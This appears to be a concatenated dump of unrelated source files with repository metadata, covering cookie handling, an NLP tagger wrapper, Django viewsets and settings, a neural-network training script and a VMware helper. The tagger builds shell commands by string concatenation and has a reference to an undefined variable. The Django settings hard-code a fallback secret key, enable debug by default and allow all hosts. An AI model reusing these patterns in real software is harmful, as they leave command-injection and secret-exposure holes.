| no_license | alexmadon/atpic_photosharing | 7829118d032344bd9a67818cd50e2c27a228d028 | 9fdddeb78548dadf946b1951aea0d0632e979156 | refs/heads/master | 2020-06-02T15:00:29.282979 | 2017-06-12T17:09:52 | 2017-06-12T17:09:52 | 94,095,494 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | # cookies libary to process
# lang, format, resolution, wiki
# file:///home/madon/doc/python-3.3a0-docs-html/library/http.cookies.html
from http import cookies
C = cookies.SimpleCookie()
C["fig"] = "newton"
C["sugar"] = "wafer"
print(C)
C = cookies.SimpleCookie()
C["rocky"] = "road"
C["rocky"]["path"] = "/cookie"
print(C.output(header="Cookie:"))
print(C["rocky"].value)
print(C.output(header=''))
print(dir(C["rocky"]))
print(C["rocky"].values())
print(C["rocky"].output())
print(C["rocky"].coded_value)
print(C["rocky"].OutputString())
C = cookies.SimpleCookie()
C.load("chips=ahoy; vienna=finger")
print(C.keys())
| [
"[email protected]"
]
| |
ff3179806be417683f17da0629967ff753f5acd1 | c06d18ac5b87b3b82fc486454c422b119d6c1ee9 | /src/demo/NLPBook/chapter5/stanford.py | e7a74651d98ea5d99c3a6e7fc528c3f3e51716fd | []
| no_license | tangermi/nlp | b3a4c9612e6049463bf12bc9abb7aff06a084ace | aa36b8b20e8c91807be73a252ff7799789514302 | refs/heads/master | 2022-12-09T12:33:15.009413 | 2020-04-03T04:03:24 | 2020-04-03T04:03:24 | 252,056,010 | 0 | 0 | null | 2022-12-08T07:26:55 | 2020-04-01T02:55:05 | Jupyter Notebook | UTF-8 | Python | false | false | 2,411 | py | # -*- coding: utf-8 -*-
import sys
import os
# CoreNLP 3.6 jar包和中文模型包
# ejml-0.23.jar
# javax.json.jar
# jollyday.jar
# joda-time.jar
# jollyday.jar
# protobuf.jar
# slf4j-api.jar
# slf4j-simple.jar
# stanford-corenlp-3.6.0.jar
# xom.jar
class StanfordCoreNLP(object):
def __init__(self,jarpath):
self.root = jarpath
self.tempsrcpath = "tempsrc" # 输入临时文件路径
self.jarlist = ["ejml-0.23.jar","javax.json.jar","jollyday.jar","joda-time.jar","protobuf.jar","slf4j-api.jar","slf4j-simple.jar","stanford-corenlp-3.6.0.jar","xom.jar"]
self.jarpath = ""
self.buildjars()
def buildjars(self): # 根据root路径构建所有的jar包路径
for jar in self.jarlist:
self.jarpath += self.root+jar+";"
def savefile(self,path,sent):
fp = open(path,"wb")
fp.write(sent)
fp.close()
# 读取和删除临时文件
def delfile(self,path):
os.remove(path)
class StanfordPOSTagger(StanfordCoreNLP):
def __init__(self,jarpath,modelpath):
StanfordCoreNLP.__init__(self,jarpath)
self.modelpath = modelpath # 模型文件路径
self.classfier = "edu.stanford.nlp.tagger.maxent.MaxentTagger"
self.delimiter = "/"
self.__buildcmd()
def __buildcmd(self): # 构建命令行
self.cmdline = 'java -mx1g -cp "'+self.jarpath+'" '+self.classfier+' -model "'+self.modelpath+'" -tagSeparator '+self.delimiter
def tag(self,sent): #标注句子
self.savefile(self.tempsrcpath,sent)
tagtxt = os.popen(self.cmdline+" -textFile "+self.tempsrcpath,'r').read() # 执行命令行
self.delfile(self.tempsrcpath)
return tagtxt
def tagfile(self,inputpath,outpath):# 标注文件
self.savefile(self.tempsrcpath,sent)
os.system(self.cmdline+' -textFile '+inputpath+' > '+outpath )
self.delfile(self.tempsrcpath)
def __buildprop(self): #创建属性文件
self.propline = 'java -mx1g -cp "'+self.jarpath+'" '+self.classfier+' -genprops'
def genpropfile(self,propath): # 获取属性文件
self.__buildprop()
propfile = os.popen(self.propline,'r').read()
self.savefile(propath,propfile)
print "save properties to ",propath
def __buildtrain(self,propspath): # 创建模型文件
self.trainline = 'java -mx4g -cp "'+self.jarpath+'" '+self.classfier +' -props "'+propspath+'"'
def trainmodel(self,propspath): # 训练模型
self.__buildtrain(propspath)
os.system(self.trainline)
print "save model to model.tagger"
| [
"[email protected]"
]
| |
8a16091fafc3f2319884a057c8e434ab0e79a775 | 7759c0ad152fe9c369b074a24601e54806b0afa8 | /backend/event/api/v1/viewsets.py | 4cba77ae5ad9f884a97fa17647488092f6c46aa1 | []
| no_license | crowdbotics-apps/covidcheck-15163 | be59f495e31b50948725fb332429751749f9b611 | a2f80fc2541bbc069cf3ec6a7f4d740aa665c77b | refs/heads/master | 2023-02-08T22:01:35.813215 | 2020-03-29T16:50:54 | 2020-03-29T16:50:54 | 250,877,575 | 0 | 0 | null | 2023-01-24T01:47:09 | 2020-03-28T19:33:39 | JavaScript | UTF-8 | Python | false | false | 3,066 | py | from rest_framework import authentication
from event.models import (
Category,
Faq,
Favorites,
Location,
MySchedule,
Presenter,
Schedule,
Sponsor,
Vendor,
VendorDetail,
)
from .serializers import (
CategorySerializer,
FaqSerializer,
FavoritesSerializer,
LocationSerializer,
MyScheduleSerializer,
PresenterSerializer,
ScheduleSerializer,
SponsorSerializer,
VendorSerializer,
VendorDetailSerializer,
)
from rest_framework import viewsets
class MyScheduleViewSet(viewsets.ModelViewSet):
serializer_class = MyScheduleSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = MySchedule.objects.all()
class CategoryViewSet(viewsets.ModelViewSet):
serializer_class = CategorySerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Category.objects.all()
class LocationViewSet(viewsets.ModelViewSet):
serializer_class = LocationSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Location.objects.all()
class PresenterViewSet(viewsets.ModelViewSet):
serializer_class = PresenterSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Presenter.objects.all()
class VendorViewSet(viewsets.ModelViewSet):
serializer_class = VendorSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Vendor.objects.all()
class FaqViewSet(viewsets.ModelViewSet):
serializer_class = FaqSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Faq.objects.all()
class ScheduleViewSet(viewsets.ModelViewSet):
serializer_class = ScheduleSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Schedule.objects.all()
class SponsorViewSet(viewsets.ModelViewSet):
serializer_class = SponsorSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Sponsor.objects.all()
class VendorDetailViewSet(viewsets.ModelViewSet):
serializer_class = VendorDetailSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = VendorDetail.objects.all()
class FavoritesViewSet(viewsets.ModelViewSet):
serializer_class = FavoritesSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Favorites.objects.all()
| [
"[email protected]"
]
| |
9b3e528238dee10f5bdee6ca543158322d95ff6a | a46d135ba8fd7bd40f0b7d7a96c72be446025719 | /packages/python/plotly/plotly/validators/scattergl/_xsrc.py | 2c107c6b510e42d803ee235a58aa1eabf4f21690 | [
"MIT"
]
| permissive | hugovk/plotly.py | 5e763fe96f225d964c4fcd1dea79dbefa50b4692 | cfad7862594b35965c0e000813bd7805e8494a5b | refs/heads/master | 2022-05-10T12:17:38.797994 | 2021-12-21T03:49:19 | 2021-12-21T03:49:19 | 234,146,634 | 0 | 0 | MIT | 2020-01-15T18:33:43 | 2020-01-15T18:33:41 | null | UTF-8 | Python | false | false | 386 | py | import _plotly_utils.basevalidators
class XsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(self, plotly_name="xsrc", parent_name="scattergl", **kwargs):
super(XsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
**kwargs
)
| [
"[email protected]"
]
| |
4aa11ff5954703255ef2662ebc7538a8a164e33c | 0eb6c70503c680ebec415016ff1b0cfac92486ca | /lincdm/views/sitemap.py | f33aa93f833be7422fb0e7b0f58bb61365b8d717 | []
| no_license | alexliyu/lincdm | c8b473946f59aca9145b3291890635474f144583 | eab93285f0b03217ea041a7910edae7e00095cd8 | refs/heads/master | 2020-12-30T10:50:05.248988 | 2011-08-09T15:52:38 | 2011-08-09T15:52:38 | 1,464,255 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 465 | py | """Views for entry sitemap"""
from django.views.generic.simple import direct_to_template
from lincdm.entry.models import Entry
from lincdm.entry.models import Category
def sitemap(*ka, **kw):
"""Wrapper around the direct to template generic view to
force the update of the extra context"""
kw['extra_context'] = {'entries': Entry.published.all(),
'categories': Category.tree.all()}
return direct_to_template(*ka, **kw)
| [
"[email protected]"
]
| |
e7102e8a75f1b70c301e29ea4054d292404bf23c | 709bd5f2ecc69a340da85f6aed67af4d0603177e | /tests/test_analytics.py | d6818e163a670b22b8bcf46edc578302d57d81ae | [
"BSD-3-Clause"
]
| permissive | Kenstogram/opensale | 41c869ee004d195bd191a1a28bf582cc6fbb3c00 | 5102f461fa90f2eeb13b9a0a94ef9cb86bd3a3ba | refs/heads/master | 2022-12-15T02:48:48.810025 | 2020-03-10T02:55:10 | 2020-03-10T02:55:10 | 163,656,395 | 8 | 0 | BSD-3-Clause | 2022-12-08T01:31:09 | 2018-12-31T09:30:41 | Python | UTF-8 | Python | false | false | 1,647 | py | from decimal import Decimal
from saleor.core.analytics import (
get_order_payloads, get_view_payloads, report_order, report_view)
def test_get_order_payloads(order_with_lines):
order = order_with_lines
generator = get_order_payloads(order)
data = list(generator)
assert len(data) == order.lines.count() + 1
transaction = data[0]
assert transaction['ti'] == order.pk
assert transaction['cu'] == order.total.currency
assert Decimal(transaction['tr']) == order.total.gross.amount
assert Decimal(transaction['tt']) == order.total.tax.amount
assert Decimal(transaction['ts']) == order.shipping_price.net.amount
for i, line in enumerate(order):
item = data[i + 1]
assert item['ti'] == order.pk
assert item['in'] == line.product_name
assert item['ic'] == line.product_sku
assert item['iq'] == str(int(line.quantity))
assert item['cu'] == line.unit_price.currency
assert Decimal(item['ip']) == line.unit_price.gross.amount
def test_report_order_has_no_errors(order_with_lines):
report_order('', order_with_lines)
def test_get_view_payloads():
headers = {'HTTP_HOST': 'getsaleor.com', 'HTTP_REFERER': 'example.com'}
generator = get_view_payloads('/test-path/', 'en-us', headers)
data = list(generator)[0]
assert data['dp'] == '/test-path/'
assert data['dh'] == 'getsaleor.com'
assert data['dr'] == 'example.com'
assert data['ul'] == 'en-us'
def test_report_view_has_no_errors():
headers = {'HTTP_HOST': 'getsaleor.com', 'HTTP_REFERER': 'example.com'}
report_view('', '/test-path/', 'en-us', headers)
| [
"[email protected]"
]
| |
51a44f03eb696ececa3a9e650a63d3177d62f625 | 976a21364b7c54e7bccddf1c9deec74577ce8bb8 | /build/rob_control/catkin_generated/pkg.develspace.context.pc.py | ae505c4d62a69cc0f460001a4541d25f31f1d6e7 | []
| no_license | jinweikim/catkin_ws | f0168b17c04863a6e5472f6199a4a9c525e0f3aa | 268ce7e348a162019e90d0e4527de4c9140ac0f8 | refs/heads/master | 2023-01-02T17:23:06.834527 | 2020-10-23T12:03:49 | 2020-10-23T12:03:49 | 262,527,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "actionlib_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "rob_control"
PROJECT_SPACE_DIR = "/home/jinwei/catkin_ws/devel"
PROJECT_VERSION = "0.0.0"
| [
"[email protected]"
]
| |
fbca50ebf0262d7c137ebc41118f7bd0b71c47de | 674649dc02390c4a60b9c62b586b81d405969047 | /network/__init__.py | 19f1226938b882bcbc77dc6b13f7782a531efc6f | []
| no_license | weijiawu/Pytorch_Classification | 709513be3e019a896ef11a1739829a97bb99c9db | 7609a1d809590c1423f4ed0ee1f0d918954355a9 | refs/heads/master | 2022-12-06T00:51:26.716590 | 2020-09-01T07:38:22 | 2020-09-01T07:38:22 | 285,811,133 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,252 | py | from __future__ import absolute_import
"""The models subpackage contains definitions for the following model for CIFAR10/CIFAR100
architectures:
- `AlexNet`_
- `VGG`_
- `ResNet`_
- `SqueezeNet`_
- `DenseNet`_
You can construct a model with random weights by calling its constructor:
.. code:: python
import torchvision.models as models
resnet18 = models.resnet18()
alexnet = models.alexnet()
squeezenet = models.squeezenet1_0()
densenet = models.densenet_161()
We provide pre-trained models for the ResNet variants and AlexNet, using the
PyTorch :mod:`torch.utils.model_zoo`. These can constructed by passing
``pretrained=True``:
.. code:: python
import torchvision.models as models
resnet18 = models.resnet18(pretrained=True)
alexnet = models.alexnet(pretrained=True)
ImageNet 1-crop error rates (224x224)
======================== ============= =============
Network Top-1 error Top-5 error
======================== ============= =============
ResNet-18 30.24 10.92
ResNet-34 26.70 8.58
ResNet-50 23.85 7.13
ResNet-101 22.63 6.44
ResNet-152 21.69 5.94
Inception v3 22.55 6.44
AlexNet 43.45 20.91
VGG-11 30.98 11.37
VGG-13 30.07 10.75
VGG-16 28.41 9.62
VGG-19 27.62 9.12
SqueezeNet 1.0 41.90 19.58
SqueezeNet 1.1 41.81 19.38
Densenet-121 25.35 7.83
Densenet-169 24.00 7.00
Densenet-201 22.80 6.43
Densenet-161 22.35 6.20
======================== ============= =============
.. _AlexNet: https://arxiv.org/abs/1404.5997
.. _VGG: https://arxiv.org/abs/1409.1556
.. _ResNet: https://arxiv.org/abs/1512.03385
.. _SqueezeNet: https://arxiv.org/abs/1602.07360
.. _DenseNet: https://arxiv.org/abs/1608.06993
"""
# from .alexnet import *
# from .vgg import *
# from .resnet import *
# from .resnext import *
# from .wrn import *
# from .preresnet import *
# from .densenet import * | [
"[email protected]"
]
| |
2b6b9fdb0f744756e2cee975230f11c0238b45ea | 31a928cff4960236923b6bc3b68e34bb2f46f470 | /sparse-evolutionary-artificial-neural-networks/SET-MLP-Keras-Weights-Mask/set_mlp_keras_cifar10.py | 1a61f24283ff805b0be5792da50162cb6b2a6831 | [
"BSD-3-Clause",
"MIT"
]
| permissive | webclinic017/ml_monorepo | 707df2afd2f986eb0721d26430e6135c917817c6 | 945f0a83d6b94282c547bb6f4805f3381ad9c16a | refs/heads/master | 2021-10-19T21:02:53.322944 | 2019-02-19T20:58:51 | 2019-02-23T20:06:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,286 | py | # Author: Decebal Constantin Mocanu et al.;
# Proof of concept implementation of Sparse Evolutionary Training (SET) of Multi Layer Perceptron (MLP) on CIFAR10 using Keras and a mask over weights.
# This implementation can be used to test SET in varying conditions, using the Keras framework versatility, e.g. various optimizers, activation layers, tensorflow
# Also it can be easily adapted for Convolutional Neural Networks or other models which have dense layers
# However, due the fact that the weights are stored in the standard Keras format (dense matrices), this implementation can not scale properly.
# If you would like to build and SET-MLP with over 100000 neurons, please use the pure Python implementation from the folder "SET-MLP-Sparse-Python-Data-Structures"
# This is a pre-alpha free software and was tested with Python 3.5.2, Keras 2.1.3, Keras_Contrib 0.0.2, Tensorflow 1.5.0, Numpy 1.14;
# The code is distributed in the hope that it may be useful, but WITHOUT ANY WARRANTIES; The use of this software is entirely at the user's own risk;
# For an easy understanding of the code functionality please read the following articles.
# If you use parts of this code please cite the following articles:
#@article{Mocanu2018SET,
# author = {Mocanu, Decebal Constantin and Mocanu, Elena and Stone, Peter and Nguyen, Phuong H. and Gibescu, Madeleine and Liotta, Antonio},
# journal = {Nature Communications},
# title = {Scalable Training of Artificial Neural Networks with Adaptive Sparse Connectivity inspired by Network Science},
# year = {2018},
# doi = {10.1038/s41467-018-04316-3}
#}
#@Article{Mocanu2016XBM,
#author="Mocanu, Decebal Constantin and Mocanu, Elena and Nguyen, Phuong H. and Gibescu, Madeleine and Liotta, Antonio",
#title="A topological insight into restricted Boltzmann machines",
#journal="Machine Learning",
#year="2016",
#volume="104",
#number="2",
#pages="243--270",
#doi="10.1007/s10994-016-5570-z",
#url="https://doi.org/10.1007/s10994-016-5570-z"
#}
#@phdthesis{Mocanu2017PhDthesis,
#title = "Network computations in artificial intelligence",
#author = "D.C. Mocanu",
#year = "2017",
#isbn = "978-90-386-4305-2",
#publisher = "Eindhoven University of Technology",
#}
from __future__ import division
from __future__ import print_function
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras import optimizers
import numpy as np
from keras import backend as K
from keras_contrib.layers.advanced_activations import SReLU
from keras.datasets import cifar10
from keras.utils import np_utils
class Constraint(object):
def __call__(self, w):
return w
def get_config(self):
return {}
class MaskWeights(Constraint):
def __init__(self, mask):
self.mask = mask
self.mask = K.cast(self.mask, K.floatx())
def __call__(self, w):
w *= self.mask
return w
def get_config(self):
return {'mask': self.mask}
def find_first_pos(array, value):
idx = (np.abs(array - value)).argmin()
return idx
def find_last_pos(array, value):
idx = (np.abs(array - value))[::-1].argmin()
return array.shape[0] - idx
def createWeightsMask(epsilon,noRows, noCols):
# generate an Erdos Renyi sparse weights mask
mask_weights = np.random.rand(noRows, noCols)
prob = 1 - (epsilon * (noRows + noCols)) / (noRows * noCols) # normal tp have 8x connections
mask_weights[mask_weights < prob] = 0
mask_weights[mask_weights >= prob] = 1
noParameters = np.sum(mask_weights)
print ("Create Sparse Matrix: No parameters, NoRows, NoCols ",noParameters,noRows,noCols)
return [noParameters,mask_weights]
class SET_MLP_CIFAR10:
def __init__(self):
# set model parameters
self.epsilon = 20 # control the sparsity level as discussed in the paper
self.zeta = 0.3 # the fraction of the weights removed
self.batch_size = 100 # batch size
self.maxepoches = 1000 # number of epochs
self.learning_rate = 0.01 # SGD learning rate
self.num_classes = 10 # number of classes
self.momentum=0.9 # SGD momentum
# generate an Erdos Renyi sparse weights mask for each layer
[self.noPar1, self.wm1] = createWeightsMask(self.epsilon,32 * 32 *3, 4000)
[self.noPar2, self.wm2] = createWeightsMask(self.epsilon,4000, 1000)
[self.noPar3, self.wm3] = createWeightsMask(self.epsilon,1000, 4000)
# initialize layers weights
self.w1 = None
self.w2 = None
self.w3 = None
self.w4 = None
# initialize weights for SReLu activation function
self.wSRelu1 = None
self.wSRelu2 = None
self.wSRelu3 = None
# create a SET-MLP model
self.create_model()
# train the SET-MLP model
self.train()
def create_model(self):
# create a SET-MLP model for CIFAR10 with 3 hidden layers
self.model = Sequential()
self.model.add(Flatten(input_shape=(32, 32, 3)))
self.model.add(Dense(4000, name="sparse_1",kernel_constraint=MaskWeights(self.wm1),weights=self.w1))
self.model.add(SReLU(name="srelu1",weights=self.wSRelu1))
self.model.add(Dropout(0.3))
self.model.add(Dense(1000, name="sparse_2",kernel_constraint=MaskWeights(self.wm2),weights=self.w2))
self.model.add(SReLU(name="srelu2",weights=self.wSRelu2))
self.model.add(Dropout(0.3))
self.model.add(Dense(4000, name="sparse_3",kernel_constraint=MaskWeights(self.wm3),weights=self.w3))
self.model.add(SReLU(name="srelu3",weights=self.wSRelu3))
self.model.add(Dropout(0.3))
self.model.add(Dense(self.num_classes, name="dense_4",weights=self.w4)) #please note that there is no need for a sparse output layer as the number of classes is much smaller than the number of input hidden neurons
self.model.add(Activation('softmax'))
def rewireMask(self,weights, noWeights):
# rewire weight matrix
# remove zeta largest negative and smallest positive weights
values = np.sort(weights.ravel())
firstZeroPos = find_first_pos(values, 0)
lastZeroPos = find_last_pos(values, 0)
largestNegative = values[int((1-self.zeta) * firstZeroPos)]
smallestPositive = values[int(min(values.shape[0] - 1, lastZeroPos +self.zeta * (values.shape[0] - lastZeroPos)))]
rewiredWeights = weights.copy();
rewiredWeights[rewiredWeights > smallestPositive] = 1;
rewiredWeights[rewiredWeights < largestNegative] = 1;
rewiredWeights[rewiredWeights != 1] = 0;
weightMaskCore = rewiredWeights.copy()
# add zeta random weights
nrAdd = 0
noRewires = noWeights - np.sum(rewiredWeights)
while (nrAdd < noRewires):
i = np.random.randint(0, rewiredWeights.shape[0])
j = np.random.randint(0, rewiredWeights.shape[1])
if (rewiredWeights[i, j] == 0):
rewiredWeights[i, j] = 1
nrAdd += 1
return [rewiredWeights, weightMaskCore]
def weightsEvolution(self):
# this represents the core of the SET procedure. It removes the weights closest to zero in each layer and add new random weights
self.w1 = self.model.get_layer("sparse_1").get_weights()
self.w2 = self.model.get_layer("sparse_2").get_weights()
self.w3 = self.model.get_layer("sparse_3").get_weights()
self.w4 = self.model.get_layer("dense_4").get_weights()
self.wSRelu1 = self.model.get_layer("srelu1").get_weights()
self.wSRelu2 = self.model.get_layer("srelu2").get_weights()
self.wSRelu3 = self.model.get_layer("srelu3").get_weights()
[self.wm1, self.wm1Core] = self.rewireMask(self.w1[0], self.noPar1)
[self.wm2, self.wm2Core] = self.rewireMask(self.w2[0], self.noPar2)
[self.wm3, self.wm3Core] = self.rewireMask(self.w3[0], self.noPar3)
self.w1[0] = self.w1[0] * self.wm1Core
self.w2[0] = self.w2[0] * self.wm2Core
self.w3[0] = self.w3[0] * self.wm3Core
def train(self):
# read CIFAR10 data
[x_train,x_test,y_train,y_test]=self.read_data()
#data augmentation
datagen = ImageDataGenerator(
featurewise_center=False, # set input mean to 0 over the dataset
samplewise_center=False, # set each sample mean to 0
featurewise_std_normalization=False, # divide inputs by std of the dataset
samplewise_std_normalization=False, # divide each input by its std
zca_whitening=False, # apply ZCA whitening
rotation_range=10, # randomly rotate images in the range (degrees, 0 to 180)
width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)
height_shift_range=0.1, # randomly shift images vertically (fraction of total height)
horizontal_flip=True, # randomly flip images
vertical_flip=False) # randomly flip images
datagen.fit(x_train)
self.model.summary()
# training process in a for loop
self.accuracies_per_epoch=[]
for epoch in range(0,self.maxepoches):
sgd = optimizers.SGD(lr=self.learning_rate, momentum=self.momentum)
self.model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
historytemp = self.model.fit_generator(datagen.flow(x_train, y_train,
batch_size=self.batch_size),
steps_per_epoch=x_train.shape[0]//self.batch_size,
epochs=epoch,
validation_data=(x_test, y_test),
initial_epoch=epoch-1)
self.accuracies_per_epoch.append(historytemp.history['val_acc'][0])
#ugly hack to avoid tensorflow memory increase for multiple fit_generator calls. Theano shall work more nicely this but it is outdated in general
self.weightsEvolution()
K.clear_session()
self.create_model()
self.accuracies_per_epoch=np.asarray(self.accuracies_per_epoch)
def read_data(self):
#read CIFAR10 data
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
y_train = np_utils.to_categorical(y_train, self.num_classes)
y_test = np_utils.to_categorical(y_test, self.num_classes)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
#normalize data
xTrainMean = np.mean(x_train, axis=0)
xTtrainStd = np.std(x_train, axis=0)
x_train = (x_train - xTrainMean) / xTtrainStd
x_test = (x_test - xTrainMean) / xTtrainStd
return [x_train, x_test, y_train, y_test]
if __name__ == '__main__':
# create and run a SET-MLP model on CIFAR10
model=SET_MLP_CIFAR10()
# save accuracies over for all training epochs
# in "results" folder you can find the output of running this file
np.savetxt("results/set_mlp_srelu_sgd_cifar10_acc.txt", np.asarray(model.accuracies_per_epoch))
| [
"[email protected]"
]
| |
38c685e5b3daa3c48549492e8305d7c6ec9b4a63 | 12b41c3bddc48a6df5e55bd16f7b2792ed6e4848 | /k8_vmware/vsphere/VM.py | 7d14aa69fb7f78566e20968c659a9f980499f6e4 | [
"Apache-2.0"
]
| permissive | NourEddineX/k8-vmware | b128b03b988f8a94d6029458c5415cdd68e12b0a | 80f2a6d56021a1298919487c8372a88aff3f1fb9 | refs/heads/main | 2023-01-23T22:59:41.767216 | 2020-12-11T12:33:11 | 2020-12-11T12:33:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,321 | py | import pyVmomi
from osbot_utils.utils.Misc import wait
from k8_vmware.vsphere.VM_Keystroke import VM_Keystroke
class VM:
def __init__(self, vm):
self.vm = vm
def config(self):
return self.summary().config
def controller_scsi(self):
controllers = self.devices_SCSI_Controllers()
if len(controllers) > 0:
return controllers[0] # default to returning the first one
def controller_ide(self):
controllers = self.devices_IDE_Controllers()
if len(controllers) > 0:
return controllers[0] # default to returning the first one
def controller_ide_free_slot(self):
controllers = self.devices_IDE_Controllers()
for controller in controllers:
if len(controller.device) < 2:
return controller
def devices(self):
return self.vm.config.hardware.device
def devices_IDE_Controllers (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualIDEController )
def devices_Cdroms (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualCdrom )
def devices_Disks (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualDisk )
def devices_AHCI_Controllers (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualAHCIController )
def devices_PCNet_32s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualPCNet32 )
def devices_Vmxnet_2s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualVmxnet2 )
def devices_Vmxnet_3s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualVmxnet3 )
def devices_E1000s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualE1000 )
def devices_E1000es (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualE1000e )
def devices_SCSI_Controllers (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualSCSIController )
def devices_Sriov_EthernetCards (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualSriovEthernetCard )
def devices_of_type(self, type):
devices = []
for device in self.devices():
if isinstance(device, type):
devices.append(device)
return devices
def devices_indexed_by_label(self):
devices = {}
for device in self.devices():
key = device.deviceInfo.label
value = device
devices[key] = value
return devices
def guest(self):
return self.summary().guest
def info(self):
summary = self.summary() # need to do this since each reference to self.vm.summary.config is call REST call to the server
#print(summary)
config = summary.config # these values are retrieved on the initial call to self.vm.summary
guest = summary.guest # using self.vm.summary.guest here would had resulted in two more REST calls
runtime = summary.runtime
info = {
"Annotation" : config.annotation ,
"BootTime" : str(runtime.bootTime) ,
"ConnectionState" : runtime.connectionState,
"GuestId" : config.guestId ,
"GuestFullName" : config.guestFullName ,
"Host" : runtime.host ,
"HostName" : guest.hostName ,
"IP" : guest.ipAddress ,
"MemorySizeMB" : config.memorySizeMB ,
"MOID" : self.vm._moId ,
"Name" : config.name ,
"MaxCpuUsage" : runtime.maxCpuUsage ,
"MaxMemoryUsage" : runtime.maxMemoryUsage ,
"NumCpu" : config.numCpu ,
"PathName" : config.vmPathName ,
"StateState" : runtime.powerState ,
"Question" : None ,
"UUID" : config.uuid
}
# if guest != None: info['IP'] = guest.ipAddress
if runtime.question != None: info['Question'] = runtime.question.text,
return info
def hardware(self):
return self.vm.config.hardware
def host_name(self):
return self.guest().hostName
def ip(self):
return self.guest().ipAddress
def name(self):
return self.config().name
def moid(self):
return self.vm._moId
def powered_state(self):
return self.runtime().powerState
def power_on(self):
return self.task().power_on()
def power_off(self):
return self.task().power_off()
def powered_on(self):
return self.powered_state() == 'poweredOn'
def powered_off(self):
return self.powered_state() == 'poweredOff'
def screenshot(self, target_file=None):
from k8_vmware.vsphere.VM_Screenshot import VM_Screenshot
return VM_Screenshot(self, target_file=target_file).download()
def send_text(self, text):
VM_Keystroke(self).send_text(text)
return self
def send_key(self, text):
result = VM_Keystroke(self).send_key(text)
return self
def send_enter(self):
VM_Keystroke(self).enter()
return self
def summary(self):
return self.vm.summary # will make REST call to RetrievePropertiesEx
def task(self):
from k8_vmware.vsphere.VM_Task import VM_Task # have to do this import here due to circular dependencies (i.e. VM_Task imports VM)
return VM_Task(self)
def runtime(self):
return self.vm.summary.runtime
def uuid(self):
return self.config().uuid
def wait(self, seconds): # to help with fluent code
wait(seconds)
return self
def __str__(self):
return f'[VM] {self.name()}'
| [
"[email protected]"
]
| |
0584747d8f65280307db8e8f7a973bf9d702eb19 | 39f1ae1e3b95d717f6d103b3ac534b468090c36f | /py_blackbox_backend/py_blackbox_backend/settings.py | 52046da510da0ace923632f0a9d29badf4aa06f4 | []
| no_license | arron1993/blackbox.arron.id | 5d532af4e9557986f8af5c9018d9d789bbd03470 | 4da60f3dd524bd0afbdc3613767a818bcab1cd8d | refs/heads/master | 2023-05-04T05:19:15.792063 | 2021-05-20T20:34:28 | 2021-05-20T20:34:28 | 346,052,952 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,974 | py | """
Django settings for py_blackbox_backend project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import datetime
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get(
'DJANGO_SECRET_KEY',
'9qyc-ncc0jq(y*4y6j4w88bffe!isuzf)1e0*sxu4w1d=k4xxo')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = os.environ.get('DJANGO_DEBUG', '') != 'False'
ALLOWED_HOSTS = ['*']
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': [
'rest_framework_simplejwt.authentication.JWTAuthentication',
],
}
SIMPLE_JWT = {
"ACCESS_TOKEN_LIFETIME": datetime.timedelta(days=7),
"REFRESH_TOKEN_LIFETIME": datetime.timedelta(days=14),
}
INSTALLED_APPS = [
